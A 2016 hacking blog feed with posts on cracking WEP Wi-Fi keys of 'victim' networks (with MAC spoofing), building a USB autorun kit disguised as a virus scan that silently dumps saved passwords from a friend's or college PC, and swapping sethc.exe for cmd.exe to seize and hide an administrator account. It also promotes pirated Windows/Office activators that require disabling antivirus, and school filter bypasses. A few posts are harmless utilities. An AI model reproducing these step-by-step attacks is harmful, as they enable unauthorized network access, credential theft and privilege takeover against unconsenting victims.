Thursday 25 August 2016

Hacking WEP wifi passwords

1. Getting the right tools
Download Backtrack 3. It can be found here:
http://www.remote-exploit.org/backtrack_download.html

The Backtrack 4 beta is out but until it is fully tested (especially if you are a noob) I would get the BT3 setup. The rest of this guide will proceed assuming you downloaded BT3. I downloaded the CD iso and burned it to a cd. Insert your BT3 cd/usb drive and reboot your computer into BT3. I always load into the 3rd boot option from the boot menu. (VESA/KDE) You only have a few seconds before it auto-boots into the 1st option so be ready. The 1st option boots too slowly or not at all so always boot from the 2nd or 3rd. Experiment to see what works best for you.

2. Preparing the victim network for attack
Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card. Type:
airmon-ng
You will see the name of your wireless card. (mine is named "ath0") From here on out, replace "ath0" with the name of your card. Now type:
airmon-ng stop ath0
then type:
ifconfig wifi0 down
then:
macchanger --mac 00:11:22:33:44:55 wifi0
then:
airmon-ng start wifi0
What these steps did was to spoof (fake) your mac address so that JUST IN CASE your computeris discovered by someone as you are breaking in, they will not see your REAL mac address. Moving on... Now it's time to discover some networks to break into.
Type:
airodump-ng ath0
Now you will see a list of wireless networks start to populate. Some will have a better signal than others and it is a good idea to pick one that has a decent signal otherwise it will take forever to crack or you may not be able to crack it at all. Once you see the network that you want to crack, do this:
hold down ctrl and tap c
This will stop airodump from populating networks and will freeze the screen so that you can see the info that you need.
**Now from here on out, when I tell you to type a command, you need to replace whatever is in parenthesis with what I tell you to from your screen. For example: if i say to type: -c (channel) then dont actually type in -c (channel) Instead, replace that with whatever the channel number is...so, for example you would type: -c 6 Can't be much clearer than that...lets continue...
Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.
Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this --> 05:gk:30:fo:s9:2n The Channel number will be under a heading that says "CH". Now, in the same Konsole window, type:
airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0
the FILE NAME can be whatever you want. This is simply the place that airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension...just pick a random word that you will remember. I usually make mine "wepkey" because I can always remember it.

**Side Note: if you crack more than one network in the same session, you must have different file names for each one or it won't work. I usually just name them wepkey1, wepkey2, etc.**

Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in noob terms all this means is "packets of info that contain clues to the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password.
I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password.
Now you are thinking, "I'm screwed because my IV's are going up really slowly." Well, don't worry, now we are going to trick the router into giving us HUNDREDS of IV's per second.

3. Actually cracking the WEP password
Now leave this Konsole window up and running and open up a 2nd Konsole window. In this one type:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0
This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean...just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds...sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.
Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password. Type:
aircrack-ng -b (bssid) (filename)-01.cap
Remember the filename you made up earlier? Mine was "wepkey". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap Once you have done this you will see aircrack fire up and begin to crack the password. typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000." DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.
If you do everything correctly up to this point, before too long you will have the password! now if the password looks goofy, dont worry, it will still work. some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.
Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as: se:cr:et This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FKW9427VF" then it would still display as: 0F:KW:94:27:VF Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!
It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.
I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network. :-)
I will gladly answer any legitimate questions anyone has to the best of my ability. HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY ANSWERED. No one wants to hold your hand through this...read the tut and go experiment until you get it right.
There are rare occasions where someone will use WEP encryption with SKA as well. (Shared Key Authentication) If this is the case, additional steps are needed to associate with the router and therefore, the steps I lined out here will not work. I've only seen this once or twice, though, so you probably won't run into it. If I get motivated, I may throw up a tut on how to crack this in the future.

How to bypass your school or college blocking sites

First of all you need to go onto:
http://g.ho.st/
This is a virtual machine/ computer that your sysadmins shouldn't have blocked. At my school, our security is pretty high because of people like me and you.

Ok, now you click on the big button that says: Start.

Now make an account, you should see the register button. I have made an account, (trust me, it is easy).

After you have logged in, you should see another screen.

After you have got logged in, you should try and get on the g.ho.st internet (alpha), to get on the internet, follow these commands.

on the desktop, click on the icon that says: find cool web stuff. Then click the icon that says: Web. Now go to: Ghost services. And there should be a icon that says: G.ho.st browser (alpha).

(If you go on a website, and it says: open in a new tab because this site will function better, (or something like that) don't do it. But if you want to, just do it).

How to hide files in a jpg

Set up:
1. Must have a .zip or .rar compressor.

Steps:
1. Save the picture of choice to your desktop.

2. Make a new .rar or .zip folder on your desktop.

3. Add the files you want to hide into the .zip or .rar

4. Click start menu, run, cmd.

5. In Command Prompt type cd "desktop" with the quotation marks.

6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg ( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg )

7. Now there should be the outputed file name with a .jpg extension on the desktop. ( Do not close Command Prompt just yet )

8. Double click it to open the picture and check it out.

9. When your done looking, and want to view the hidden files Type: ren outputfilename.jpg outputfilename.rar  or zip
Now you're done!
A quick info-fact: With this technique of hiding files in a jpg you can send this to anyone and they just have to rename the file extension to .zip or .rar.

How To Rename Your Recycle Bin

1. Click Start / Run.

2. Type regedit and press enter.

3. Open the HKEY_CLASSES_ROOT folder.

4. Open the CLSID folder.

5. Open the {645FF040-5081-101B-9F08-00AA002F954E} folder.

6. Open the ShellFolder folder

7. Change the "Attributes" data value from "40 01 00 20" to "50 01 00 20". Once completed change the "CallForAttributes" dword value to "0x00000000" (doubleclick and change value data to 0). You must change both of these values to get the rename to appear.
After performing the above steps you will be able to rename the icon like any other icon. Right-click the Recycle Bin icon on the desktop and click Rename and rename it to whatever you wish.

How to hack passwords using USB Drive

Today I will show you how to hack Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit:

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free. Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. -----------------------------------------------------------------------------------------------
Here is a step by step procedre to create the password hacking toolkit:
NOTE: You must temporarily disable your antivirus before following these steps....

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it: [autorun] open=launch.bat ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it: start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps...

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

How To Hack An Administrator Account With A Guest Account

(The only way this is going to work is if your account has permission to mody files in folder «system32»)

Ever wanted to hack your college pc with guest account/student account so that you can download with full speed Hack Administrator !!!!there ? or just wanted to hack your friend’s pc to make him gawk when you tell your success story of hacking ?

well,there is a great way of hacking an administrator account from a guest account by which you can reset the administrator password and getting all the privilages an administrator enjoys on windows.. Interested ? read on…

Concept
Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.
Prerequisites
Guest account with write access to system 32.
Here is how to do that -
* Go to C:/windows/system32 * Copy cmd.exe and paste it on desktop * rename cmd.exe to sethc.exe * Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.
When asked to overwrite, overwrite the sethc.exe.
* Now Log out from your guest account and at the user select window,press shift key 5 times. * Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.
Press shift key 5 times and command prompt will open.
* Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter. * You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password. * Congrats You have hacked admin from guest account.
Further..
Also, you can further create a new user at the command prompt by typing “NET USER Ephemeral /ADD” where “Ephemeral” is the username you would like to add with administrator privileges. Then hide your newly created admin account by
Go to registry editor and navigate to this key
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Here create a new DWORD value, write its name as the “user name” that u created for your admin account and live with your admin account forever :)

Folder Lock With Password Without Any Software

Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').
Any name will do.
Then you see a batch file.
Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.
Now bring all the files you want to hide in the 'Locker' folder.
Double click on the batch file to lock the folder namely 'Locker'.
If you want to unlock your files,double click the batch file again and you would be prompted for password.
Enter the password and enjoy access to the folder.
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST Locker goto MDLOCKER :CONFIRM echo Are you sure u want to Lock the folder(Y/N) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069A2DD-08002B30309D}" echo Folder locked goto End :UNLOCK echo Enter password to Unlock folder set/p "pass=>" if NOT %pass%==type your password here goto FAIL attrib -h -s "Control Panel.{21EC2020-3AEA-1069A2DD-08002B30309D}" ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker echo Folder Unlocked successfully goto End :FAIL echo Invalid password goto end :MDLOCKER md Locker echo Locker created successfully goto End :End

Friday 19 August 2016

20 Popular Wireless Hacking Tools 2k16

1. Aircrack
Aircrack is the most popular and widely-
known wireless password cracking tool. It is
used as 802.11 WEP and WPA-PSK keys
cracking tool around the globe. It first
captures packets of the network and then try
to recover password of the network by
analyzing packets. It also implements
standard FMS attacks with some
optimizations to recover or crack password of
the network. optimizations include KoreK
attacks and PTW attack to make the attack
much faster than other WEP password
cracking tools. This tool is powerful and used
most widely across the world. This is the
reason I am adding it at the top of the list.
It offers console interface. If you find this tool
hard to use, you can try the available online
tutorials. Company behind this tool also offers
online tutorial to let you learn by yourself.
Download: http://www.aircrack-ng.org/
2. AirSnort
AirSnort is another popular wireless LAN
password cracking tool. It can crack WEP keys
of Wi-Fi802.11b network. This tool basically
operates by passively monitoring
transmissions and then computing the
encryption key when enough packets have
been gathered. This tool is freely available for
Linux and Windows platform. It is also simple
to use. The tool has not been updated for
around three years, but it seems that company
behind this tool is now interested in further
development. This tool is also directly
involved in WEP cracking and hence used
widely.
Download AirSnort: http://sourceforge.net/
projects/airsnort/
3. Kismet
Kismet is another Wi-Fi 802.11 a/b/g/n layer
2 wireless network sniffer and intrusion
detection system. This tool is basically used in
Wi-Fi troubleshooting. It works fine with any
Wi-Fi card supporting rfmon mode. It is
available for Windows, Linux, OS X and BSD
platforms. This tool passively collects packets
to identify standard network and also detects
the hidden networks. Built on a client server
modular architecture, this tool can sniff
802.11b, 802.11a, 802.11g, and 802.11n
traffic. It is an open source tool and supports
recent faster wireless standards.
Download Kismet: http://
www.kismetwireless.net/download.shtml
4. Cain & Able
Cain & Able is another popular tool used for
cracking wireless network passwords. This
tool was developed to intercept the network
traffic and then use the brute forcing to
discover the passwords. This is why this tool
helps a lot while finding the password of
wireless network by analyzing the routing
protocols. This tool can also be used to crack
other kind of passwords. It is one of the most
popular password cracking tools.
This tool is not just for WEP cracking but
various other features are also there. It is
basically used for Windows password
cracking. This is the reason this tool is so
popular among users.
Download Cain & Able: http://www.oxid.it/
cain.html
5. WireShark
WireShark is a very popular tool in networking.
It is the network protocol analyzer tool which
lets you check different things in your office or
home network. You can live capture packets
and analyze packets to find various things
related to network by checking the data at the
micro-level. This tool is available for Windows,
Linux, OS X, Solaris, FreeBSD and other
platforms.
If you are thinking to try this tool, I
recommend you to first read about networking
and protocols. WireShark requires good
knowledge of network protocols to analyze the
data obtained with the tool. If you do not
have good knowledge of that, you may not
find this tool interesting. So, try only if you are
sure about your protocol knowledge.
Wireshark does is one of the most popular
tool in networking and this is why it was
included in this list in higher position.
Download Wireshark: https://
www.wireshark.org/
6. Fern WiFi Wireless Cracker
Fern WiFi Wireless Cracker is another nice tool
which helps with network security. It lets you
see real-time network traffic and identify
hosts. Basically this tool was developed to
find flaws in computer networks and fixes the
detected flaws. It is available for Apple,
Windows and Linux platforms.
it is able to crack and recover WEP/WPA/WPS
keys easily. It can also run other network
based attacks on wireless or Ethernet based
networks. For cracking WPA/WPA2, it uses
WPS based on dictionary based attacks. For
WEP cracking, it uses Fragmentation, Chop-
Chop, Caffe-Latte, Hirte, ARP Request Replay
or WPS attack.
This tool is in active development. SO, you can
expect timely update with new features. Pro
version of the tool is also available which
offers much features.
Download Fern WiFi Wireless cracker: http://
www.fern-pro.com/downloads.php
7. CoWPAtty
CoWPAtty is another nice wireless password
cracking tool. It is an automated dictionary
attack tool for WPA-PSK to crack the
passwords. It runs on Linux OS and offers a
less interesting command line interface to
work with. It runs on a word-list containing
thousands of password to use in the attack. If
the password is in the password’s word-list,
this tool will surely crack the password. But
this tool is slow and speed depends on the
word list and password’s strength. Another
reason for slow process is that the hash uses
SHA1 with a seed of SSID. It means the same
password will have a different SSIM. So, you
cannot simply use the rainbow table against
all access points. So, the tool uses the
password dictionary and generates the hash
for each word contained in the dictionary by
using the SSID. This tool is simple to use with
available commands.
With the newer version of the tool CoWPAtty
tried to improve the speed by using a pre-
computed hash file to avoid the computation
at the time of cracking. This pre-computed file
contains around 172000 dictionary file for
around 1000 most popular SSIDs. But for
successful attack, your SSID must be in that
list. If your SSID is not in those 1000, you are
unlucky. Still, you can try this tool to see how
it works.
Download CoWPAtty: http://sourceforge.net/
projects/cowpatty/
8. Airjack
Airjack is a Wi-Fi 802.11 packet injection tool.
It is used to perform DOS attack and MIM
attack. This wireless cracking tool is very
useful in injecting forged packets and making
a network down by denial of service attack.
This tool can also be used for a man in the
middle attack in the network. This tool is
popular and powerful both.
Download AirJack: http://sourceforge.net/
projects/airjack/
9. WepAttack
WepAttack is another working open source
Linux tool for breaking 802.11 WEP keys. Like
few other tools in the list, this tool also
performs an active dictionary attack. It tests
millions of words from its dictionary to find
the working key for the network. Only a
working WLAN card is required to work with
WepAttack to perform the attack. Limited
usability but works awesome on supported
WLAN cards.
Download WepAttack: http://
wepattack.sourceforge.net/
10. NetStumbler
NetStumbler is another wireless password
cracking tool available only for Windows
platform. It helps in finding open wireless
access points. This tool is freely available.
Basically NetStumbler is used for wardriving,
verifying network configurations, finding
locations with a poor network, detecting
unauthorized access points, and more.
This tool is not very effective now. Main
reason is that last stable release of the tool
was back in April 2004 around 11 years ago.
So, it does not work with 64-bit Windows OS.
It can also be easily detected with most of the
wireless intrusion detection systems available.
So, you can use this tool for learning purpose
on home network to see how it works.
A trimmed down version dubbed as
‘MiniStumbler’ of the tool is also available.
This tool is too old but it still works fine on
supported systems. So, I included it in this
list.
Download NetStumbler: http://
www.stumbler.net/
11. inSSIDer
inSSIDer is one of the most popular Wi-Fi
scanner for Microsoft Windows and OS X
platforms. This tool was released under open
source license and also awarded as “Best
Open Source Software in Networking”. Later it
became premium tool and now costs $19.99.
The inSSIDer Wi-Fi scanner can do various
tasks, including finding open Wi-Fi access
points, tracking signal strength, and saving
logs with GPS records. Basically this tool is
used by network administrators to find the
issues in the wireless networks
Download inSSIDer: http://www.inssider.com/
12. Wifiphisher
Wifiphisher is another nice hacking tool to get
password of a wireless network. This tool can
execute fast automated phishing attack
against a Wi-Fi wireless network to steal
passwords. This tool comes pre-installed on
Kali Linux. It is free to use and is available for
Windows, MAC and Linux.
Download and read more about WiFiphisher:
https://github.com/sophron/wifiphisher
13. KisMac
KisMac is tool very much similar to Kismet, we
added in the list above. It offers features
similar to Kismet and is used as wireless
network discovery hacking tool. As the name
suggests, this tool is only available for Mac. It
scans for networks passively only on
supported wireless cards and then try to crack
WEP and WPA keys by using brute force or
exploiting any flaw.
Download KisMac:
http://kismac-ng.org/
14. Reaver
Reaver is an open-source tool for performing
brute force attack against WPS to recover
WPA/WPA2 pass keys. This tool is hosted on
Google Code and may disappear soon if
developer has not migrated it to another
platform. It was last updated around 4 years
ago. Similar to other tools, this tool can be a
good alternate to other tools in the list which
use same attack method.
Download Reaver:
https://code.google.com/p/reaver-wps/
downloads/list
15. Wifite
Wifite is also a nice tool which supports
cracking WPS encrypted networks via reaver.
It works on Linux based operating systems. It
offers various nice features related to
password cracking.
Download Wifite: https://github.com/derv82/
wifite
We have a complete article on Wifite. Read
wifite walkthrough .
ETHICAL HACKING TRAINING – RESOURCES
(INFOSEC)
16. WepDecrypt
WepDecrypt is another wireless LAN tool
written in C language. This tool can guess the
WEP keys by performing dictionary attack,
distributed network attack, key generator and
some other methods. This tool needs few
libraries to work. You can read more details
on the download page. Tool is not so popular
but it is good for beginners to see how
dictionary attack works.
Download and read more about WepDecrypt:
http://wepdecrypt.sourceforge.net/
wepdecrypt-manual.html
17. OmniPeek
OmniPeek is a packet sniffer and network
packets analyzer tool. This tool is only
available for Windows platform and is
available for commercial use only. It also
requires you to have good knowledge of
network protocols and understanding of
network packets. It works with most of the
network interface cards available in market.
With available plugins, this tool can become
more powerful. Around 40 plugins are already
available to extend the functions of this tool.
Download OmniPeek: http://
www.wildpackets.com/products/
distributed_network_analysis/
omnipeek_network_analyzer
18. CloudCracker
CloudCracker is an online password cracking
tool to crack WPA keys of Wireless network.
This tool can also be used to crack various
other kind of password hashes. You only need
to upload the handshake file and enter the
network name to start the attack. With 3000
million words long dictionary, this tool is most
likely to crack the password. This tool is also
used for MD5, SHA and few other cracking. It
is also an effective tool and worth to mention
if we talk about wireless cracking tools.
See CloudCracker: https://
www.cloudcracker.com/
19. CommonView for Wi-Fi
CommonView for Wi-Fi is also a popular
wireless network monitor and packer analyzer
tool. It comes with easy to understand and
use GUI to work with. This tool is basically for
Wi-Fi network admins and security
professionals who want to monitor and
troubleshoot network related problems. It
works fine with Wi-Fi 802.11 a/b/g/n/ac
networks. It captures every single packet and
lets you see useful information of the network.
You can also get useful information like
protocol distribution, access points, signal
strength and more. This tool offers key
information about a network and has a good
value for network admins.
Download CommonView: http://
www.tamos.com/products/commwifi/
20. Pyrit
Pyrit is also a very good tool which lets you
perform attack on IEEE 802.11 WPA/WPA2-
PSK authentication. This tool is available for
free and is hosted on Google Code. SO, it
could be disappearing in coming months. It
works on range of platforms including
FreeBSD, MacOS X and Linux.
It performs brute-force attack to crack the
WPA/WPA-2 passwords. It is very effective
and I recommend you to try it once. Due to its
effectiveness, it was necessary to mention this
tool in this list.
Download Pyrit:
https://code.google.com/p/pyrit/

Stay tuned with jd

Microsoft Office 2016 VL ProPlus Multi-39 (x64) August 2016

Look HERE

Thursday 18 August 2016

Re-Loader Activator

This is application the loader activation all
versions of Windows and Office 2010, Office
2013, Office 2015 , Office 2016. You may
thinking what to choose. Either Kmspico,
Reloader or some other Activator. Simply use
what you want. This tool is more light weight,
but does what its intended to do : Let you use
Windows and office products forever. Simple
as that. Let us know when this worked for you.
If you got an issue we got your back, simply
comment below and we’ll be here to help you.
Also more information is given below
The following versions of Windows can be
activated with this Loader…
Windows XP
Home Edition SP3
Professional SP3
Media Center Edition 2005 SP3
Windows Vista
Enterprise
Enterprise N
Business
Business N
Starter
Home Basic
Home Basic N
Home Premium
Ultimate
Windows 7
Enterprise
Enterprise N
Enterprise E
Starter
Home Basic
Home Premium
Professional
Professional N
Ultimate
Embedded POS Ready
Embedded
Embedded Thin PC
Windows 8
Enterprise
Enterprise N
Core
Core N
Core ARM
Core Country SpecIFic
Core Single Language
Professional
Professional WMC
Professional N
Windows 8.1
Enterprise
Enterprise N
Professional
Professional N
Professional WMC
Core
Core Connected
Core Connected N
Core Connected Single Language
Core Connected Country Specific
Professional Student
Professional Student N
Core ARM
Core N
Core Single Language
Core Country Specific
Embedded Industry A
Embedded Industry E
Embedded Industry
Windows 10
Professional
Professional N
Education
Education N
Enterprise
Enterprise N
Enterprise 2015 LTSB
Enterprise 2015 LTSB N
Home
Home N
Home Single Language
Home Country Specific
Windows 10 TP
Home Connected
Home Connected N
Home Connected Single Language
Home Connected Country Specific
Professional Student
Professional Student N
Professional 2015 LTSB
Professional 2015 LTSB N
Home ARM
Professional WMC
Windows Server 2008
ServerDatacenter
ServerDatacenterV
ServerEnterprise
ServerEnterpriseV
ServerEnterpriseIA64
ServerStandard
ServerStandardV
ServerComputeCluster
ServerWeb
ServerSBSStandard
ServerWinFoundation
ServerHomeStandard
ServerSolution
ServerHomePremium
Windows Server 2008 R2
ServerDatacenter
ServerEnterprise
ServerEnterpriseIA64
ServerStandard
ServerEmbeddedSolution
ServerHPC
ServerWeb
ServerSBSPrime
ServerSBSStandard
ServerStorageStandard
Windows Server 2012
ServerDatacenter
ServerStandard
ServerMultiPointPremium
ServerMultiPointStandard
ServerSolution
ServerWinFoundation
ServerStorageStandard
ServerStorageWorkgroup
Windows Server 2012 R2 / 2016 TP
ServerStandardCore
ServerStandard
ServerDatacenterCore
ServerDatacenter
SolutionCore
Solution
ServerCloudStorageCore
ServerCloudStorage
ServerStorageStandard
Windows Server 2016 Next-Gen
ServerARM64
ServerHI
What’s New ?
Still a Fix in the activation phase OEM .
Faster ulteriormento activation process
Win7 OEM .
How to Use it For Activating Windows and
Office ?
1. Disable your antivirus
2. Now run the “.exe” file from the .zip file
and click on Accept button
3. Now click on product icon which you want
to activate
4. Click activate and after a few seconds your
product is activated
5. That’s it. Enjoy !

DOWNLOAD IT HERE

Ratiborus KMS Tools

Ratiborus KMS Tools
See  HERE

Windows 10 toggle tweaker

See what tweaker does HERE

Activate windows 10 permanently

Activate Windows 10 permanently by clicking  HERE

Combine Multiple Internet Connections on Android

VideoBee is a brand-new application offered
for Android mobiles. VideoBee allows you to
combine your Mobile Internet and Wi-Fi
connections together. VideoBee boosts
streaming and download speed of videos on
many popular websites. No root access is
required. Work on 99% of Android devices
[2.3.3+].If you have 2 active different Internet
connections then link them by utilizing
VideoBee like WiFi + mobile or WiFi + WiFi.
Even you can pair with your good friends and
share their and your internet connection like
mobile + mobile.
This App allows you to save your time and
make your internet connection faster my
merging two connections. So, as you have
multiple internet connections your internet
speed reaches sky high and tend to enjoy
super fast multiple internet connections at the
price of just one.

Repair Corrupted Memory Card

If your SD card (external memory) is
unreadable, corrupted, damaged, or
has some kind of error you should
first do a Check Disk within a MS
Windows command prompt.
You need to eject (take out) your
SD card from your device (phone,
camera, etc) and insert it into your
computer.
Then to go a command prompt
(click on start menu, then type in
CMD in the in the search box)
Type: chkdsk /x /f e:
If above does not work then type
“chkdsk e: /f”
The letter E is my removable drive
where my sd card is in. You may be
in different drive ex., F, G?
After check disk is is complete
chances are your back in biz. Make
sure you copy all your stuff to a
folder on your computer then format
your card and move everything
back. It may be wise to keep a copy
on your computer too just in case.
Note: This will not work for all you
you. If you get an error message
from check disk with something
about RAW files then checkdisk will
not work. However, you may try to
eject and keep reinserting your sd
card until it can read your card,
meaning it wont say it is a RAW
file. Small chance but it this has
worked before. If this does not work
you can look for programs that can
retrieve this files that have been
corrupted or even deleted or
formatted. I don’t recall the
program i used last time for this
but i got back like 80% of the
videos and photos i had on the sd
card.